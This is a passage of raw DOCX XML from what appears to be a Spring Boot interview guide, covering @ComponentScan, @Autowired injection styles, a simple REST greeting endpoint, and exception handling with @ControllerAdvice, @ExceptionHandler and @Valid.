    <w:p w14:paraId="1D7A35AD"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E10F6">
          <v:rect id="_x0000_i2558" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469EF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ComponentScan is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enable automatic bean detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and registration by scanning specified packages for Spring components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11942291" w14:textId="608EBC8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559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71167C26" w14:textId="298ED37C" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="002C3B85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="_Toc197867824"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Autowired annotation</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
    </w:p>
    <w:p w14:paraId="16B0ADB7" w14:textId="668BF789"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wired is used in Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically inject dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (beans) into a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130507D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DA898">
          <v:rect id="_x0000_i2560" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="430BA6F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311036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eliminates the need for explicit bean wiring using XML or configuration methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606D8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99F78">
          <v:rect id="_x0000_i2561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB58C2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52CE5E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looks for a matching bean in the container by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and injects it into the target field, constructor, or method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200C6E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B786AD">
          <v:rect id="_x0000_i2562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DBA03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 Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DB0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1. Field Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42804EE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4F603D8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A261C3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14791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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23753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3FB8A9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401DA0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2. Constructor Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615A6A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57A6BD9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2C425CB" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EAB1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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB09292" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF3C3C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A99F5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Service(EmployeeRepository employeeRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47530A2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employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA28F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BC1F2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8E89B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3. Setter Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945CF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645A12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844B6B5" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F21E73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2AF076F" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FBD15D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3FC0E9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EmployeeRepository(EmployeeRepository repo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C8419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repo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188856E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7AC6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E48F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B66AA5">
          <v:rect id="_x0000_i2563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2511A85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Optional Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A49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with @Qualifier if multiple beans of the same type exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB26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required=false to make the dependency optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61AB3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626F1">
          <v:rect id="_x0000_i2564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F209D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Autowired tells Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve and inject a bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the marked class automatically, promoting loose coupling and better dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC70770" w14:textId="7F46D0A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565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CDF06" w14:textId="20AF8FD9" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3542">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="611" w:name="_Toc197867825"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
    </w:p>
    <w:p w14:paraId="3817EF70" w14:textId="5C3B9D2C"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re's a simple REST API using </w:t>
      </w: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xml:space="preserve"> that accepts a username as input via a query parameter and returns a JSON response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0949745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426">
          <v:rect id="_x0000_i2566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62008FC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ndpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A98E09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username=Siddhant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDFBFE"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18079">
          <v:rect id="_x0000_i2567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E91D0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Controller Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AB87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55430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79C66B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4C150D58" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EADB87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498AA2B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Map&lt;String, String&gt;&gt; getMessage(@RequestParam String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66913F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D3D85A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Hello, " + username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D89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success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB41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ok(response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697189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3A51BC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026CA9A"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AA58A8">
          <v:rect id="_x0000_i2568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3749B7"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Sample Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313CE2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D9158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ssage": "Hello, Siddhant",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C721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atus": "success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76522B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4A13DA9" w14:textId="78D2D7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569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E055F" w14:textId="0199F774" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="006075E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="612" w:name="_Toc197867826"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle Exceptions in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="612"/>
    </w:p>
    <w:p w14:paraId="1EA7A911" w14:textId="4312AB8B" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F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exceptions can be handled in a structured and flexible way using the following approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210DBDFB"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9D8101">
          <v:rect id="_x0000_i2570" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="273E00A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ControllerAdvice for Global Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAEE0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 is used to handle exceptions globally across all controllers in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ACF6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A7346C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36E5D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1C1880C3" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7310881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ResourceNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42A11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ResourceNotFound(ResourceNotFoundException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BDAF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447CBC4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004FDB9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12A9157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NOT_FOUND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA352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C4F73B" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4D5F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5968204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GeneralException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC67C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315A7B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An unexpected error occurred");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CFE55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029DBD2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INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E61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DA8E1C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E9CCAF"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ustom Exception Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E1D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6B8D86D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2F7BB1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376436F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9E8CD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F8DAA0F"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6AC6CD">
          <v:rect id="_x0000_i2571" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1E3C2"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sponseStatus Annotation for Specific Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B48F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Status annotation can be used to specify the HTTP status code when a particular exception is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A19A0"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FF5BAF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Status(HttpStatus.NOT_FOUND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31122CC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214DD8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428863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056E54C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B78D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AD9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whenever a ResourceNotFoundException is thrown, the HTTP status will be 404 Not Found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7C3F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96C3C">
          <v:rect id="_x0000_i2572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5567C4"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ExceptionHandler in Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737ABB4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handle exceptions specific to a controller using @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F23A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0B792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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E707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6AC2F2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69A13C1" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF4C77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1C95708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name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AE9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username == null || username.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6242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row new IllegalArgumentException("Username cannot be empty");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B957E8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123C7C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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3E2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0EC833" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26232E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IllegalArgumentException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB468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IllegalArgument(IllegalArgumentException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AEB1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FE9A0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70CFA08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684F362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41DE97B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7038B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33D163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if an IllegalArgumentException occurs, it will be caught and handled by the method with @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989B28A"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9F164">
          <v:rect id="_x0000_i2573" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6293365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ResponseEntityExceptionHandler for Common Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4497A7A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EntityExceptionHandler can be extended to provide global exception handling for common exceptions, such as MethodArgumentNotValidException (for validation errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09069C0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D9CE9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7AC15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ExceptionHandler extends ResponseEntityExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD3D19" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DDC28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3B7C4B5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ResponseEntity&lt;Object&gt; handleMethodArgumentNotValid(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A645A4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thodArgumentNotValidException ex, HttpHeaders headers, HttpStatus status, WebRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8E6D4" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEC4F5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77ABE3B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184CB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527651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2016E81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D2F29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B1F0E3"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E80FC">
          <v:rect id="_x0000_i2574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173005D"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Custom Exception Handling with @Valid for Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E1F0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Spring's @Valid annotation along with exception handling to catch validation errors for incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC36E73"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712D6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79E7E3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otNull(message = "Username cannot be null")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E9E6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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0E4DC" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A48B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1EC05E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ABBDB9"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p w14:paraId="259A2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21968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149843E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30720216" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C6C1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ostMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC744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createUser(@Valid @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706704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for creating user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E70D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status(HttpStatus.CREATED).body(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BDD8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83E02FF" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E05B5A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MethodArgumentNotValidException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C165F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ValidationException(MethodArgumentNotValidException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B9B1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82867B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611EB19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718FCD5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34C5CF9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3BA6C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A0E5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746E5">
          <v:rect id="_x0000_i2575" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564A17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Exception Handling Techniques in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093B3E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r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @ControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69F5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ing @ResponseStatus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for HTTP status codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05055CC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specific Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5279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andling Validation Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @Valid and MethodArgumentNotValidException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BC7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techniques help in centralizing exception handling, maintaining clean code, and providing consistent error responses across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B586D" w14:textId="2C58659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576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="512974D2" w14:textId="1C5BBD82" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00286E36">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="_Toc197867827"/>
